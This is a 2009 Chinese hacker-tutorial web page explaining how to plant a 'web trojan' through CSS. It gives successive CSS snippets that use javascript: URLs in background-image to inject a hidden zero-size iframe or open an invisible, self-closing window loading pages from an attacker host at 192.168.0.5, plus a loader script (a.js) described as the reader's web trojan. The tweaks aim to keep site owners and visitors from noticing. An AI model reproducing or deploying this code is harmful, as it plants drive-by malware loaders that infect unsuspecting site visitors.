当前位置: 首页 > 图文教程 > 网络安全 > 黑客技术 > 真正能用,还有点效果的CSS挂马代码的方法

黑客技术
超初级的linux后门制作方法
ASP漏洞全接触-高级篇
ASP漏洞全接触-进阶篇
ASP漏洞全接触-入门篇
IP和MAC捆绑的破解
如何突破各种防火墙的防护
黑客避开检测的手段
个人用户防黑指南
如何追踪入侵者
密码破解全教程
天意商务系统后台管理帐号破解html版
黑客入侵Windows XP系统常用七大招数
风讯4.0未公开Bug
Discuz! 4.x SQL injection / admin credentials disclosure exploit
discuz许愿池插件远程包含漏洞
防止电脑被他人控制
最详细的SQL注入相关的命令整理 (转)
渗透中用openrowset搞shell的方法
当网站不允许上传asp cer cdx htr文件时的一个解决方法!
PHPSHELL又出新东东啦!

黑客技术 中的 真正能用,还有点效果的CSS挂马代码的方法


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 87 ::
收藏到网摘: n/a

网上流行的:
body
{
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法会使主页不正常.返回一片空白.
用弹窗.
body
{
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//弹出一个框.难看 易被发现.
改进一下:
body
{
background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
test.htm里面的代码,a.js为你的网马,弹出一个不可见的窗口,并在5秒自动后关闭没提示:
<script src="a.js"></script>
<script>
window.opener=null;setTimeout("window.close();",5000);
</script>
a.js内容:
document.write('<Iframe src="http://192.168.0.5/calc.htm"></iframe>');
请指教.